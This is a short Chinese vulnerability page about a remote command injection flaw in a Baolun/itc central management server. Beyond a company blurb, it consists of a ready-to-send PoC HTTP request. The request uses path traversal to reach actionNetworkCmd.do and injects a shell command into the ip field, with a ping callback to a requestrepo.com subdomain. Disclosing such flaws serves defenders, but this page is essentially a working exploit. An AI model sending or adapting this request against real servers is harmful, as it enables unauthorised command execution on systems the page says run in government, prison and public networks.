中心管理服务器 actionNetworkCmd 存在后台命令执行

日期: 2024-08-02 | 影响软件: actionNetworkCmd | POC: 已公开

漏洞描述

广东保伦电子股份有限公司成立于2008年,旗下itc品牌创立于1993年,拥有五大生产基地、三大商务办公楼、独立营销物流中心、广州研发中心、杭州研发中心,在职员工超6000名。致力于声、光、电、视讯系统的研发和生产,共拥有覆盖公共广播、数字会议、无纸化会议、视频会议、专业扩声、云会务、中央控制、高清矩阵、录播系统、分布式综合管理信息平台、LED显示屏、舞台灯光、景观照明等全系列自主知识产权和自主品牌的声光电视讯系统。系统广泛应用于政府机关、教育、企业单位、文体场馆、国防、医疗、消防、交通、监狱、金融、地产、能源制造、宾馆酒店、超市商场、公园广场、平安城市等行业个性化、数字化、信息化建设,在国内市场和国际市场都有很高的占有率。旗下中心管理服务器系统存在远程命令注入漏洞

PoC代码

POST /sdk/../system/actionNetworkCmd.do HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=C044ABDE31C24F65B0601530F784C41B; _language_=X19JVENfX3poX0NO
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

time=3&type=0&ip=[REDACTED];ping -c 1 984kzexd.requestrepo.com #